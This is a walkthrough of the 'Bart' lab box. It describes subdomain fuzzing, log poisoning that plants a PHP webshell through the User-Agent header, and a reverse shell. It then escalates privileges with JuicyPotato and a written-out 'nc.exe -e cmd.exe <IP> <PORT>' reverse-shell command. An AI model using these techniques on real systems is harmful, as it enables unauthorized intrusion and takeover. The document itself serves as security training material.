
Gaining Access

Nmap scan:

Only one port was available. We had to add forum.bart.htb to our /etc/hosts file to access the website.

Web Enum

The website was a standard company page:

I checked the page source, and found a unique bit here. Seems like there was a user that was not shown for some reason.

harvey is the user we probably need to access.

We can fuzz subdomains using the bart.htb domain to find more places to visit.


We can visit this to see that it's running PHP Server Monitor v3.2.1.

harvey:potter works as credentials to let us log in. There, we would view an internal chat instance.

I looked around and found the settings for this internal chat service, and found another subdomain.

We can head to that domain to find another application running.

Simple Chat Log Poisoning

There's a login page within the new page. Our previous credentials of harvey:potter do not work here.

However, what's interesting was the URL of the website, at http://internal-01.bart.htb/simple_chat/login_form.php. Googling around, we can find the exact simple_chat PHP application being used as it is a open-source project.

Within the source code, we can view the register.php to see how to register a new user.

All we need to do is sent a POST request with the uname and passwd parameters to register.

Afterwards, I logged into the server.

Within this page, there's the ability to view the Log files, and when we do, we would first get a pop-up similar to xss with 1, and have this GET request be sent to the machine.

When viewing this log, I noticed that the User-Agent was copied from my machine.

I played around with this and altered my User-Agent field to something else, and it was still copied over.

With this, because it is a PHP page, I attempted to write a webshell within the HTTP header and also change the page to a PHP page by altering the filename parameter.

With this, we can easily gain a reverse shell into the machine using Invoke-PowerShellTcp, as other shells don't work out well.

Privilege Escalation


When checking our privileges, we notice we have the SeImpersonatePrivilege enabled.

Checking systeminfo, we also find that a vulnerable version of Windows was running with no hotfixes.

We can run the JuicyPotato exploit to get a reverse shell as root. First, we need to create a .bat file that would be run. I used nc.exe to run my shell:

C:\Temp\nc.exe -e cmd.exe <IP> <PORT>

Then, we can get JuicyPotato on the machine and run it with a CLSID. We can find one from this page:

Afterwards, we would catch a shell as the administrator.